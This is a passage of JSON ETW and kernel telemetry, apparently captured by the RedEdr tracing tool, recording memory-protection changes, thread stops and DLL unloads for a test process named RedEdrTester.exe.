17.48.17","OriginalProcessId":"1208","OriginalProcessProtection":"(Unknown type)","OriginalProcessSectionSignatureLevel":"(Unknown type)","OriginalProcessSignatureLevel":"(Unknown type)","OriginalProcessStartKey":"25332747903961354","ProtectionMask":"128","RegionSize":"0x0000025BA365C720","TargetProcessCreateTime":"2024/12/20 17.48.17","TargetProcessId":"1208","TargetProcessProtection":"(Unknown type)","TargetProcessSectionSignatureLevel":"(Unknown type)","TargetProcessSignatureLevel":"(Unknown type)","TargetProcessStartKey":"25332747903961354","event":"PROTECTVM_LOCAL","id":108,"pid":1208,"provider_name":"Microsoft-Windows-Threat-Intelligence","thread_id":6916,"time":133791868973910254,"trace_id":41,"type":"etw"},{"BaseAddress":"0x0000025BA365C5E0","CallingProcessCreateTime":"2024/12/20 17.48.17","CallingProcessId":"1208","CallingProcessProtection":"(Unknown type)","CallingProcessSectionSignatureLevel":"(Unknown type)","CallingProcessSignatureLevel":"(Unknown type)","CallingProcessStartKey":"25332747903961354","CallingThreadCreateTime":"2024/12/20 17.48.17","CallingThreadId":"6916","LastProtectionMask":"64","OriginalProcessCreateTime":"2024/12/20 17.48.17","OriginalProcessId":"1208","OriginalProcessProtection":"(Unknown type)","OriginalProcessSectionSignatureLevel":"(Unknown type)","OriginalProcessSignatureLevel":"(Unknown type)","OriginalProcessStartKey":"25332747903961354","ProtectionMask":"32","RegionSize":"0x0000025BA365CB30","TargetProcessCreateTime":"2024/12/20 17.48.17","TargetProcessId":"1208","TargetProcessProtection":"(Unknown type)","TargetProcessSectionSignatureLevel":"(Unknown type)","TargetProcessSignatureLevel":"(Unknown type)","TargetProcessStartKey":"25332747903961354","event":"PROTECTVM_LOCAL","id":109,"pid":1208,"provider_name":"Microsoft-Windows-Threat-Intelligence","thread_id":6916,"time":133791868973910267,"trace_id":41,"type":"etw"},{"BaseAddress":"0x0000025BA365C9A0","CallingProcessCreateTime":"2024/12/20 17.48.17","CallingProcessId":"1208","CallingProcessProtection":"(Unknown type)","CallingProcessSectionSignatureLevel":"(Unknown type)","CallingProcessSignatureLevel":"(Unknown type)","CallingProcessStartKey":"25332747903961354","CallingThreadCreateTime":"2024/12/20 17.48.17","CallingThreadId":"6916","LastProtectionMask":"64","OriginalProcessCreateTime":"2024/12/20 17.48.17","OriginalProcessId":"1208","OriginalProcessProtection":"(Unknown type)","OriginalProcessSectionSignatureLevel":"(Unknown type)","OriginalProcessSignatureLevel":"(Unknown type)","OriginalProcessStartKey":"25332747903961354","ProtectionMask":"128","RegionSize":"0x0000025BA365C8B0","TargetProcessCreateTime":"2024/12/20 17.48.17","TargetProcessId":"1208","TargetProcessProtection":"(Unknown type)","TargetProcessSectionSignatureLevel":"(Unknown type)","TargetProcessSignatureLevel":"(Unknown type)","TargetProcessStartKey":"25332747903961354","event":"PROTECTVM_LOCAL","id":110,"pid":1208,"provider_name":"Microsoft-Windows-Threat-Intelligence","thread_id":6916,"time":133791868973910279,"trace_id":41,"type":"etw"},{"BaseAddress":"0x0000025BA365CB30","CallingProcessCreateTime":"2024/12/20 17.48.17","CallingProcessId":"1208","CallingProcessProtection":"(Unknown type)","CallingProcessSectionSignatureLevel":"(Unknown type)","CallingProcessSignatureLevel":"(Unknown type)","CallingProcessStartKey":"25332747903961354","CallingThreadCreateTime":"2024/12/20 17.48.17","CallingThreadId":"6916","LastProtectionMask":"64","OriginalProcessCreateTime":"2024/12/20 17.48.17","OriginalProcessId":"1208","OriginalProcessProtection":"(Unknown type)","OriginalProcessSectionSignatureLevel":"(Unknown type)","OriginalProcessSignatureLevel":"(Unknown type)","OriginalProcessStartKey":"25332747903961354","ProtectionMask":"128","RegionSize":"0x0000025BA365C7C0","TargetProcessCreateTime":"2024/12/20 17.48.17","TargetProcessId":"1208","TargetProcessProtection":"(Unknown type)","TargetProcessSectionSignatureLevel":"(Unknown type)","TargetProcessSignatureLevel":"(Unknown type)","TargetProcessStartKey":"25332747903961354","event":"PROTECTVM_LOCAL","id":111,"pid":1208,"provider_name":"Microsoft-Windows-Threat-Intelligence","thread_id":6916,"time":133791868973910292,"trace_id":41,"type":"etw"},{"BaseAddress":"0x0000025BA365C630","CallingProcessCreateTime":"2024/12/20 17.48.17","CallingProcessId":"1208","CallingProcessProtection":"(Unknown type)","CallingProcessSectionSignatureLevel":"(Unknown type)","CallingProcessSignatureLevel":"(Unknown type)","CallingProcessStartKey":"25332747903961354","CallingThreadCreateTime":"2024/12/20 17.48.17","CallingThreadId":"6916","LastProtectionMask":"64","OriginalProcessCreateTime":"2024/12/20 17.48.17","OriginalProcessId":"1208","OriginalProcessProtection":"(Unknown type)","OriginalProcessSectionSignatureLevel":"(Unknown type)","OriginalProcessSignatureLevel":"(Unknown type)","OriginalProcessStartKey":"25332747903961354","ProtectionMask":"128","RegionSize":"0x0000025BA365C5E0","TargetProcessCreateTime":"2024/12/20 17.48.17","TargetProcessId":"1208","TargetProcessProtection":"(Unknown type)","TargetProcessSectionSignatureLevel":"(Unknown type)","TargetProcessSignatureLevel":"(Unknown type)","TargetProcessStartKey":"25332747903961354","event":"PROTECTVM_LOCAL","id":112,"pid":1208,"provider_name":"Microsoft-Windows-Threat-Intelligence","thread_id":6916,"time":133791868973910304,"trace_id":41,"type":"etw"},{"BaseAddress":"0x0000025BA365C900","CallingProcessCreateTime":"2024/12/20 17.48.17","CallingProcessId":"1208","CallingProcessProtection":"(Unknown type)","CallingProcessSectionSignatureLevel":"(Unknown type)","CallingProcessSignatureLevel":"(Unknown type)","CallingProcessStartKey":"25332747903961354","CallingThreadCreateTime":"2024/12/20 17.48.17","CallingThreadId":"6916","LastProtectionMask":"64","OriginalProcessCreateTime":"2024/12/20 17.48.17","OriginalProcessId":"1208","OriginalProcessProtection":"(Unknown type)","OriginalProcessSectionSignatureLevel":"(Unknown type)","OriginalProcessSignatureLevel":"(Unknown type)","OriginalProcessStartKey":"25332747903961354","ProtectionMask":"128","RegionSize":"0x0000025BA365C810","TargetProcessCreateTime":"2024/12/20 17.48.17","TargetProcessId":"1208","TargetProcessProtection":"(Unknown type)","TargetProcessSectionSignatureLevel":"(Unknown type)","TargetProcessSignatureLevel":"(Unknown type)","TargetProcessStartKey":"25332747903961354","event":"PROTECTVM_LOCAL","id":113,"pid":1208,"provider_name":"Microsoft-Windows-Threat-Intelligence","thread_id":6916,"time":133791868973910316,"trace_id":41,"type":"etw"},{"BaseAddress":"0x0000025BA365C9F0","CallingProcessCreateTime":"2024/12/20 17.48.17","CallingProcessId":"1208","CallingProcessProtection":"(Unknown type)","CallingProcessSectionSignatureLevel":"(Unknown type)","CallingProcessSignatureLevel":"(Unknown type)","CallingProcessStartKey":"25332747903961354","CallingThreadCreateTime":"2024/12/20 17.48.17","CallingThreadId":"6916","LastProtectionMask":"64","OriginalProcessCreateTime":"2024/12/20 17.48.17","OriginalProcessId":"1208","OriginalProcessProtection":"(Unknown type)","OriginalProcessSectionSignatureLevel":"(Unknown type)","OriginalProcessSignatureLevel":"(Unknown type)","OriginalProcessStartKey":"25332747903961354","ProtectionMask":"32","RegionSize":"0x0000025BA365C9A0","TargetProcessCreateTime":"2024/12/20 17.48.17","TargetProcessId":"1208","TargetProcessProtection":"(Unknown type)","TargetProcessSectionSignatureLevel":"(Unknown type)","TargetProcessSignatureLevel":"(Unknown type)","TargetProcessStartKey":"25332747903961354","event":"PROTECTVM_LOCAL","id":114,"pid":1208,"provider_name":"Microsoft-Windows-Threat-Intelligence","thread_id":6916,"time":133791868973910328,"trace_id":41,"type":"etw"},{"BaseAddress":"0x0000025BA365C810","CallingProcessCreateTime":"2024/12/20 17.48.17","CallingProcessId":"1208","CallingProcessProtection":"(Unknown type)","CallingProcessSectionSignatureLevel":"(Unknown type)","CallingProcessSignatureLevel":"(Unknown type)","CallingProcessStartKey":"25332747903961354","CallingThreadCreateTime":"2024/12/20 17.48.17","CallingThreadId":"6916","LastProtectionMask":"64","OriginalProcessCreateTime":"2024/12/20 17.48.17","OriginalProcessId":"1208","OriginalProcessProtection":"(Unknown type)","OriginalProcessSectionSignatureLevel":"(Unknown type)","OriginalProcessSignatureLevel":"(Unknown type)","OriginalProcessStartKey":"25332747903961354","ProtectionMask":"32","RegionSize":"0x0000025BA365C8B0","TargetProcessCreateTime":"2024/12/20 17.48.17","TargetProcessId":"1208","TargetProcessProtection":"(Unknown type)","TargetProcessSectionSignatureLevel":"(Unknown type)","TargetProcessSignatureLevel":"(Unknown type)","TargetProcessStartKey":"25332747903961354","event":"PROTECTVM_LOCAL","id":115,"pid":1208,"provider_name":"Microsoft-Windows-Threat-Intelligence","thread_id":6916,"time":133791868973910344,"trace_id":41,"type":"etw"},{"BaseAddress":"0x0000025BA365C9A0","CallingProcessCreateTime":"2024/12/20 17.48.17","CallingProcessId":"1208","CallingProcessProtection":"(Unknown type)","CallingProcessSectionSignatureLevel":"(Unknown type)","CallingProcessSignatureLevel":"(Unknown type)","CallingProcessStartKey":"25332747903961354","CallingThreadCreateTime":"2024/12/20 17.48.17","CallingThreadId":"6916","LastProtectionMask":"64","OriginalProcessCreateTime":"2024/12/20 17.48.17","OriginalProcessId":"1208","OriginalProcessProtection":"(Unknown type)","OriginalProcessSectionSignatureLevel":"(Unknown type)","OriginalProcessSignatureLevel":"(Unknown type)","OriginalProcessStartKey":"25332747903961354","ProtectionMask":"32","RegionSize":"0x0000025BA365C900","TargetProcessCreateTime":"2024/12/20 17.48.17","TargetProcessId":"1208","TargetProcessProtection":"(Unknown type)","TargetProcessSectionSignatureLevel":"(Unknown type)","TargetProcessSignatureLevel":"(Unknown type)","TargetProcessStartKey":"25332747903961354","event":"PROTECTVM_LOCAL","id":116,"pid":1208,"provider_name":"Microsoft-Windows-Threat-Intelligence","thread_id":6916,"time":133791868973910355,"trace_id":41,"type":"etw"},{"BaseAddress":"0x0000025BA365C4A0","CallingProcessCreateTime":"2024/12/20 17.48.17","CallingProcessId":"1208","CallingProcessProtection":"(Unknown type)","CallingProcessSectionSignatureLevel":"(Unknown type)","CallingProcessSignatureLevel":"(Unknown type)","CallingProcessStartKey":"25332747903961354","CallingThreadCreateTime":"2024/12/20 17.48.17","CallingThreadId":"6916","LastProtectionMask":"64","OriginalProcessCreateTime":"2024/12/20 17.48.17","OriginalProcessId":"1208","OriginalProcessProtection":"(Unknown type)","OriginalProcessSectionSignatureLevel":"(Unknown type)","OriginalProcessSignatureLevel":"(Unknown type)","OriginalProcessStartKey":"25332747903961354","ProtectionMask":"32","RegionSize":"0x0000025BA365C950","TargetProcessCreateTime":"2024/12/20 17.48.17","TargetProcessId":"1208","TargetProcessProtection":"(Unknown type)","TargetProcessSectionSignatureLevel":"(Unknown type)","TargetProcessSignatureLevel":"(Unknown type)","TargetProcessStartKey":"25332747903961354","event":"PROTECTVM_LOCAL","id":117,"pid":1208,"provider_name":"Microsoft-Windows-Threat-Intelligence","thread_id":6916,"time":133791868973910372,"trace_id":41,"type":"etw"},{"BaseAddress":"0x0000025BA365C540","CallingProcessCreateTime":"2024/12/20 17.48.17","CallingProcessId":"1208","CallingProcessProtection":"(Unknown type)","CallingProcessSectionSignatureLevel":"(Unknown type)","CallingProcessSignatureLevel":"(Unknown type)","CallingProcessStartKey":"25332747903961354","CallingThreadCreateTime":"2024/12/20 17.48.17","CallingThreadId":"6916","LastProtectionMask":"64","OriginalProcessCreateTime":"2024/12/20 17.48.17","OriginalProcessId":"1208","OriginalProcessProtection":"(Unknown type)","OriginalProcessSectionSignatureLevel":"(Unknown type)","OriginalProcessSignatureLevel":"(Unknown type)","OriginalProcessStartKey":"25332747903961354","ProtectionMask":"32","RegionSize":"0x0000025BA365C900","TargetProcessCreateTime":"2024/12/20 17.48.17","TargetProcessId":"1208","TargetProcessProtection":"(Unknown type)","TargetProcessSectionSignatureLevel":"(Unknown type)","TargetProcessSignatureLevel":"(Unknown type)","TargetProcessStartKey":"25332747903961354","event":"PROTECTVM_LOCAL","id":118,"pid":1208,"provider_name":"Microsoft-Windows-Threat-Intelligence","thread_id":6916,"time":133791868973910413,"trace_id":41,"type":"etw"},{"callback":"thread_create","create":0,"id":119,"krn_pid":1208,"pid":1208,"threadid":11092,"time":133791868989812038,"trace_id":41,"type":"kernel"},{"callback":"thread_create","create":0,"id":120,"krn_pid":1208,"pid":1208,"threadid":6916,"time":133791868989812038,"trace_id":41,"type":"kernel"},{"callback":"thread_create","create":0,"id":121,"krn_pid":1208,"pid":1208,"threadid":3196,"time":133791868989812038,"trace_id":41,"type":"kernel"},{"callback":"thread_create","create":0,"id":122,"krn_pid":1208,"pid":1208,"threadid":5680,"time":133791868989812038,"trace_id":41,"type":"kernel"},{"CycleTime":"181056096","ProcessID":"1208","StackBase":"FFFF8185AAC62000","StackLimit":"FFFF8185AAC5C000","StartAddr":"00007FF7711C4616","SubProcessTag":"0","TebBase":"0000009FD88D8000","ThreadID":"6916","UserStackBase":"0000009FD8B00000","UserStackLimit":"0000009FD8AF6000","Win32StartAddr":"00007FF7711C4616","event":"ThreadStopStop ","id":123,"opcode_id":2,"pid":1208,"provider_name":"22fb2cd6-0e7b-422b-a0c7-2fad1fd0e716","stack_trace":[18446735283797242684,18446735283801644436,18446735283801643055,18446735283801352931,18446735283801347736,18446735283796947549,18446735283798949776,18446735283799009711],"thread_id":6916,"time":133791868989812926,"trace_id":41,"type":"etw"},{"CycleTime":"287100","ProcessID":"1208","StackBase":"FFFF8185AAC77000","StackLimit":"FFFF8185AAC71000","StartAddr":"00007FFC8513D110","SubProcessTag":"0","TebBase":"0000009FD88DA000","ThreadID":"11092","UserStackBase":"0000009FD8C00000","UserStackLimit":"0000009FD8BFF000","Win32StartAddr":"00007FFC8513D110","event":"ThreadStopStop ","id":124,"opcode_id":2,"pid":1208,"provider_name":"22fb2cd6-0e7b-422b-a0c7-2fad1fd0e716","stack_trace":[18446735283797242684,18446735283801644436,18446735283801643055,18446735283801352931,18446735283801347736,18446735283796947549,18446735283798949776,18446735283799009711],"thread_id":11092,"time":133791868989812928,"trace_id":41,"type":"etw"},{"CycleTime":"107316","ProcessID":"1208","StackBase":"FFFF8185AAC8C000","StackLimit":"FFFF8185AAC86000","StartAddr":"00007FFC8513D110","SubProcessTag":"0","TebBase":"0000009FD88DC000","ThreadID":"3196","UserStackBase":"0000009FD8D00000","UserStackLimit":"0000009FD8CFF000","Win32StartAddr":"00007FFC8513D110","event":"ThreadStopStop ","id":125,"opcode_id":2,"pid":1208,"provider_name":"22fb2cd6-0e7b-422b-a0c7-2fad1fd0e716","stack_trace":[18446735283797242684,18446735283801644436,18446735283801643055,18446735283801352931,18446735283801347736,18446735283796947549,18446735283798949776,18446735283799009711],"thread_id":3196,"time":133791868989813773,"trace_id":41,"type":"etw"},{"CycleTime":"2887740","ProcessID":"1208","StackBase":"FFFF8185AC7B9000","StackLimit":"FFFF8185AC7B3000","StartAddr":"0000023F29030000","SubProcessTag":"0","TebBase":"0000009FD88DE000","ThreadID":"5680","UserStackBase":"0000009FD8E00000","UserStackLimit":"0000009FD8DF7000","Win32StartAddr":"0000023F29030000","event":"ThreadStopStop ","id":126,"opcode_id":2,"pid":1208,"provider_name":"22fb2cd6-0e7b-422b-a0c7-2fad1fd0e716","stack_trace":[18446735283797242684,18446735283801644436,18446735283801643055,18446735283801352931,18446735283801754190,18446735283799009541],"thread_id":5680,"time":133791868989814117,"trace_id":41,"type":"etw"},{"DefaultBase":"00007FF771160000","ImageBase":"00007FF771160000","ImageCheckSum":"0","ImageName":"\\Device\\HarddiskVolume2\\Users\\hacker\\source\\repos\\RedEdr\\x64\\Debug\\RedEdrTester.exe","ImageSize":"000000000018E000","ProcessID":"1208","TimeDateStamp":"1734703906","event":"ImageUnloadInfo ","id":127,"opcode_id":0,"pid":1208,"provider_name":"22fb2cd6-0e7b-422b-a0c7-2fad1fd0e716","stack_trace":[18446735283802249410,18446735283797621171,18446735283801386793,18446735283801520226,18446735283800918026,18446735283801353166,18446735283801754190,18446735283799009541],"thread_id":5680,"time":133791868989814755,"trace_id":41,"type":"etw"},{"DefaultBase":"00007FFC628D0000","ImageBase":"00007FFC628D0000","ImageCheckSum":"2249853","ImageName":"\\Device\\HarddiskVolume2\\Windows\\System32\\ucrtbased.dll","ImageSize":"0000000000222000","ProcessID":"1208","TimeDateStamp":"3642813796","event":"ImageUnloadInfo ","id":128,"opcode_id":0,"pid":1208,"provider_name":"22fb2cd6-0e7b-422b-a0c7-2fad1fd0e716","stack_trace":[18446735283802249410,18446735283797621171,18446735283801386793,18446735283801520226,18446735283800918026,18446735283801353166,18446735283801754190,18446735283799009541],"thread_id":5680,"time":133791868989814891,"trace_id":41,"type":"etw"},{"DefaultBase":"00007FFC62B00000","ImageBase":"00007FFC62B00000","ImageCheckSum":"929031","ImageName":"\\Device\\HarddiskVolume2\\Windows\\System32\\msvcp140d.dll","ImageSize":"00000000000E2000","ProcessID":"1208","TimeDateStamp":"4270244042","event":"ImageUnloadInfo ","id":129,"opcode_id":0,"pid":1208,"provider_name":"22fb2cd6-0e7b-422b-a0c7-2fad1fd0e716","stack_trace":[18446735283802249410,18446735283797621171,18446735283801386793,18446735283801520226,18446735283800918026,18446735283801353166,18446735283801754190,18446735283799009541],"thread_id":5680,"time":133791868989814978,"trace_id":41,"type":"etw"},{"DefaultBase":"00007FFC630A0000","ImageBase":"00007FFC630A0000","ImageCheckSum":"0","ImageName":"\\Device\\HarddiskVolume2\\RedEdr\\RedEdrDll.dll","ImageSize":"0000000000082000","ProcessID":"1208","TimeDateStamp":"1734697896","event":"ImageUnloadInfo ","id":130,"opcode_id":0,"pid":1208,"provider_name":"22fb2cd6-0e7b-422b-a0c7-2fad1fd0e716","stack_trace":[18446735283802249410,18446735283797621171,18446735283801386793,18446735283801520226,18446735283800918026,18446735283801353166,18446735283801754190,18446735283799009541],"thread_id":5680,"time":133791868989815067,"trace_id":41,"type":"etw"},{"DefaultBase":"00007FFC73E50000","ImageBase":"00007FFC73E50000","ImageCheckSum":"1883635","ImageName":"\\Device\\HarddiskVolume2\\Windows\\System32\\dbghelp.dll","ImageSize":"00000000001E4000","ProcessID":"1208","TimeDateStamp":"2592498981","event":"ImageUnloadInfo ","id":131,"opcode_id":0,"pid":1208,"provider_name":"22fb2cd6-0e7b-422b-a0c7-2fad1fd0e716","stack_trace":[18446735283802249410,18446735283797621171,18446735283801386793,18446735283801520226,18446735283800918026,18446735283801353166,18446735283801754190,18446735283799009541],"thread_id":5680,"time":133791868989815129,"trace_id":41,"type":"etw"},{"DefaultBase":"00007FFC77340000","ImageBase":"00007FFC77340000","ImageCheckSum":"215677","ImageName":"\\Device\\HarddiskVolume2\\Windows\\System32\\vcruntime140d.dll","ImageSize":"000000000002B000","ProcessID":"1208","TimeDateStamp":"3390545094","event":"ImageUnloadInfo ","id":132,"opcode_id":0,"pid":1208,"provider_name":"22fb2cd6-0e7b-422b-a0c7-2fad1fd0e716","stack_trace":[18446735283802249410,18446735283797621171,18446735283801386793,18446735283801520226,18446735283800918026,18446735283801353166,18446735283801754190,18446735283799009541],"thread_id":5680,"time":133791868989815203,"trace_id":41,"type":"etw"},{"DefaultBase":"00007FFC7DD50000","ImageBase":"00007FFC7DD50000","ImageCheckSum":"124685","ImageName":"\\Device\\HarddiskVolume2\\Windows\\System32\\vcruntime140_1d.dll","ImageSize":"000000000000F000","ProcessID":"1208","TimeDateStamp":"743278547","event":"ImageUnloadInfo ","id":133,"opcode_id":0,"pid":1208,"provider_name":"22fb2cd6-0e7b-422b-a0c7-2fad1fd0e716","stack_trace":[18446735283802249410,18446735283797621171,18446735283801386793,18446735283801520226,18446735283800918026,18446735283801353166,18446735283801754190,18446735283799009541],"thread_id":5680,"time":133791868989815284,"trace_id":41,"type":"etw"},{"DefaultBase":"00007FFC82800000","ImageBase":"00007FFC82800000","ImageCheckSum":"3204207","ImageName":"\\Device\\HarddiskVolume2\\Windows\\System32\\KernelBase.dll","ImageSize":"00000000002FE000","ProcessID":"1208","TimeDateStamp":"3522100337","event":"ImageUnloadInfo ","id":134,"opcode_id":0,"pid":1208,"provider_name":"22fb2cd6-0e7b-422b-a0c7-2fad1fd0e716","stack_trace":[18446735283802249410,18446735283797621171,18446735283801386793,18446735283801520226,18446735283800918026,18446735283801353166,18446735283801754190,18446735283799009541],"thread_id":5680,"time":133791868989815348,"trace_id":41,"type":"etw"},{"DefaultBase":"00007FFC82B00000","ImageBase":"00007FFC82B00000","ImageCheckSum":"1180473","ImageName":"\\Device\\HarddiskVolume2\\Windows\\System32\\gdi32full.dll","ImageSize":"0000000000117000","ProcessID":"1208","TimeDateStamp":"576863693","event":"ImageUnloadInfo ","id":135,"opcode_id":0,"pid":1208,"provider_name":"22fb2cd6-0e7b-422b-a0c7-2fad1fd0e716","stack_trace":[18446735283802249410,18446735283797621171,18446735283801386793,18446735283801520226,18446735283800918026,18446735283801353166,18446735283801754190,18446735283799009541],"thread_id":5680,"time":133791868989815408,"trace_id":41,"type":"etw"},{"DefaultBase":"00007FFC82C20000","ImageBase":"00007FFC82C20000","ImageCheckSum":"199345","ImageName":"\\Device\\HarddiskVolume2\\Windows\\System32\\bcrypt.dll","ImageSize":"0000000000027000","ProcessID":"1208","TimeDateStamp":"2535700803","event":"ImageUnloadInfo ","id":136,"opcode_id":0,"pid":1208,"provider_name":"22fb2cd6-0e7b-422b-a0c7-2fad1fd0e716","stack_trace":[18446735283802249410,18446735283797621171,18446735283801386793,18446735283801520226,18446735283800918026,18446735283801353166,18446735283801754190,18446735283799009541],"thread_id":5680,"time":133791868989815463,"trace_id":41,"type":"etw"},{"DefaultBase":"00007FFC82C50000","ImageBase":"00007FFC82C50000","ImageCheckSum":"1076532","ImageName":"\\Device\\HarddiskVolume2\\Windows\\System32\\ucrtbase.dll","ImageSize":"0000000000100000","ProcessID":"1208","TimeDateStamp":"2177850761","event":"ImageUnloadInfo ","id":137,"opcode_id":0,"pid":1208,"provider_name":"22fb2cd6-0e7b-422b-a0c7-2fad1fd0e716","stack_trace":[18446735283802249410,18446735283797621171,18446735283801386793,18446735283801520226,18446735283800918026,18446735283801353166,18446735283801754190,18446735283799009541],"thread_id":5680,"time":133791868989815520,"trace_id":41,"type":"etw"},{"DefaultBase":"00007FFC82F60000","ImageBase":"00007FFC82F60000","ImageCheckSum":"531569","ImageName":"\\Device\\HarddiskVolume2\\Windows\\System32\\bcryptprimitives.dll","ImageSize":"0000000000082000","ProcessID":"1208","TimeDateStamp":"3309379821","event":"ImageUnloadInfo ","id":138,"opcode_id":0,"pid":1208,"provider_name":"22fb2cd6-0e7b-422b-a0c7-2fad1fd0e716","stack_trace":[18446735283802249410,18446735283797621171,18446735283801386793,18446735283801520226,18446735283800918026,18446735283801353166,18446735283801754190,18446735283799009541],"thread_id":5680,"time":133791868989815580,"trace_id":41,"type":"etw"},{"DefaultBase":"00007FFC82FF0000","ImageBase":"00007FFC82FF0000","ImageCheckSum":"137991","ImageName":"\\Device\\HarddiskVolume2\\Windows\\System32\\win32u.dll","ImageSize":"0000000000022000","ProcessID":"1208","TimeDateStamp":"3336608826","event":"ImageUnloadInfo ","id":139,"opcode_id":0,"pid":1208,"provider_name":"22fb2cd6-0e7b-422b-a0c7-2fad1fd0e716","stack_trace":[18446735283802249410,18446735283797621171,18446735283801386793,18446735283801520226,18446735283800918026,18446735283801353166,18446735283801754190,18446735283799009541],"thread_id":5680,"time":133791868989815638,"trace_id":41,"type":"etw"},{"DefaultBase":"00007FFC83070000","ImageBase":"00007FFC83070000","ImageCheckSum":"659111","ImageName":"\\Device\\HarddiskVolume2\\Windows\\System32\\msvcp_win.dll","ImageSize":"000000000009D000","ProcessID":"1208","TimeDateStamp":"958749903","event":"ImageUnloadInfo ","id":140,"opcode_id":0,"pid":1208,"provider_name":"22fb2cd6-0e7b-422b-a0c7-2fad1fd0e716","stack_trace":[18446735283802249410,18446735283797621171,18446735283801386793,18446735283801520226,18446735283800918026,18446735283801353166,18446735283801754190,18446735283799009541],"thread_id":5680,"time":133791868989815696,"trace_id":41,"type":"etw"},{"DefaultBase":"00007FFC83190000","ImageBase":"00007FFC83190000","ImageCheckSum":"811940","ImageName":"\\Device\\HarddiskVolume2\\Windows\\System32\\kernel32.dll","ImageSize":"00000000000C2000","ProcessID":"1208","TimeDateStamp":"2273328705","event":"ImageUnloadInfo ","id":141,"opcode_id":0,"pid":1208,"provider_name":"22fb2cd6-0e7b-422b-a0c7-2fad1fd0e716","stack_trace":[18446735283802249410,18446735283797621171,18446735283801386793,18446735283801520226,18446735283800918026,18446735283801353166,18446735283801754190,18446735283799009541],"thread_id":5680,"time":133791868989815751,"trace_id":41,"type":"etw"},{"DefaultBase":"00007FFC833E0000","ImageBase":"00007FFC833E0000","ImageCheckSum":"218727","ImageName":"\\Device\\HarddiskVolume2\\Windows\\System32\\gdi32.dll","ImageSize":"000000000002B000","ProcessID":"1208","TimeDateStamp":"3634633287","event":"ImageUnloadInfo ","id":142,"opcode_id":0,"pid":1208,"provider_name":"22fb2cd6-0e7b-422b-a0c7-2fad1fd0e716","stack_trace":[18446735283802249410,18446735283797621171,18446735283801386793,18446735283801520226,18446735283800918026,18446735283801353166,18446735283801754190,18446735283799009541],"thread_id":5680,"time":133791868989815806,"trace_id":41,"type":"etw"},{"DefaultBase":"00007FFC83410000","ImageBase":"00007FFC83410000","ImageCheckSum":"1244603","ImageName":"\\Device\\HarddiskVolume2\\Windows\\System32\\rpcrt4.dll","ImageSize":"0000000000123000","ProcessID":"1208","TimeDateStamp":"2016036219","event":"ImageUnloadInfo ","id":143,"opcode_id":0,"pid":1208,"provider_name":"22fb2cd6-0e7b-422b-a0c7-2fad1fd0e716","stack_trace":[18446735283802249410,18446735283797621171,18446735283801386793,18446735283801520226,18446735283800918026,18446735283801353166,18446735283801754190,18446735283799009541],"thread_id":5680,"time":133791868989815860,"trace_id":41,"type":"etw"},{"DefaultBase":"00007FFC83B50000","ImageBase":"00007FFC83B50000","ImageCheckSum":"766771","ImageName":"\\Device\\HarddiskVolume2\\Windows\\System32\\advapi32.dll","ImageSize":"00000000000B1000","ProcessID":"1208","TimeDateStamp":"187986496","event":"ImageUnloadInfo ","id":144,"opcode_id":0,"pid":1208,"provider_name":"22fb2cd6-0e7b-422b-a0c7-2fad1fd0e716","stack_trace":[18446735283802249410,18446735283797621171,18446735283801386793,18446735283801520226,18446735283800918026,18446735283801353166,18446735283801754190,18446735283799009541],"thread_id":5680,"time":133791868989815915,"trace_id":41,"type":"etw"},{"DefaultBase":"00007FFC83D40000","ImageBase":"00007FFC83D40000","ImageCheckSum":"681663","ImageName":"\\Device\\HarddiskVolume2\\Windows\\System32\\msvcrt.dll","ImageSize":"000000000009E000","ProcessID":"1208","TimeDateStamp":"2616593924","event":"ImageUnloadInfo ","id":145,"opcode_id":0,"pid":1208,"provider_name":"22fb2cd6-0e7b-422b-a0c7-2fad1fd0e716","stack_trace":[18446735283802249410,18446735283797621171,18446735283801386793,18446735283801520226,18446735283800918026,18446735283801353166,18446735283801754190,18446735283799009541],"thread_id":5680,"time":133791868989815968,"trace_id":41,"type":"etw"},{"DefaultBase":"00007FFC83DE0000","ImageBase":"00007FFC83DE0000","ImageCheckSum":"244437","ImageName":"\\Device\\HarddiskVolume2\\Windows\\System32\\imm32.dll","ImageSize":"000000000002F000","ProcessID":"1208","TimeDateStamp":"3510600902","event":"ImageUnloadInfo ","id":146,"opcode_id":0,"pid":1208,"provider_name":"22fb2cd6-0e7b-422b-a0c7-2fad1fd0e716","stack_trace":[18446735283802249410,18446735283797621171,18446735283801386793,18446735283801520226,18446735283800918026,18446735283801353166,18446735283801754190,18446735283799009541],"thread_id":5680,"time":133791868989816028,"trace_id":41,"type":"etw"},{"DefaultBase":"00007FFC84650000","ImageBase":"00007FFC84650000","ImageCheckSum":"673563","ImageName":"\\Device\\HarddiskVolume2\\Windows\\System32\\sechost.dll","ImageSize":"000000000009F000","ProcessID":"1208","TimeDateStamp":"1942365337","event":"ImageUnloadInfo ","id":147,"opcode_id":0,"pid":1208,"provider_name":"22fb2cd6-0e7b-422b-a0c7-2fad1fd0e716","stack_trace":[18446735283802249410,18446735283797621171,18446735283801386793,18446735283801520226,18446735283800918026,18446735283801353166,18446735283801754190,18446735283799009541],"thread_id":5680,"time":133791868989816082,"trace_id":41,"type":"etw"},{"DefaultBase":"00007FFC848D0000","ImageBase":"00007FFC848D0000","ImageCheckSum":"1221752","ImageName":"\\Device\\HarddiskVolume2\\Windows\\System32\\ole32.dll","ImageSize":"000000000012B000","ProcessID":"1208","TimeDateStamp":"610785574","event":"ImageUnloadInfo ","id":148,"opcode_id":0,"pid":1208,"provider_name":"22fb2cd6-0e7b-422b-a0c7-2fad1fd0e716","stack_trace":[18446735283802249410,18446735283797621171,18446735283801386793,18446735283801520226,18446735283800918026,18446735283801353166,18446735283801754190,18446735283799009541],"thread_id":5680,"time":133791868989816147,"trace_id":41,"type":"etw"},{"DefaultBase":"00007FFC84A00000","ImageBase":"00007FFC84A00000","ImageCheckSum":"1745311","ImageName":"\\Device\\HarddiskVolume2\\Windows\\System32\\user32.dll","ImageSize":"000000000019D000","ProcessID":"1208","TimeDateStamp":"4291603748","event":"ImageUnloadInfo 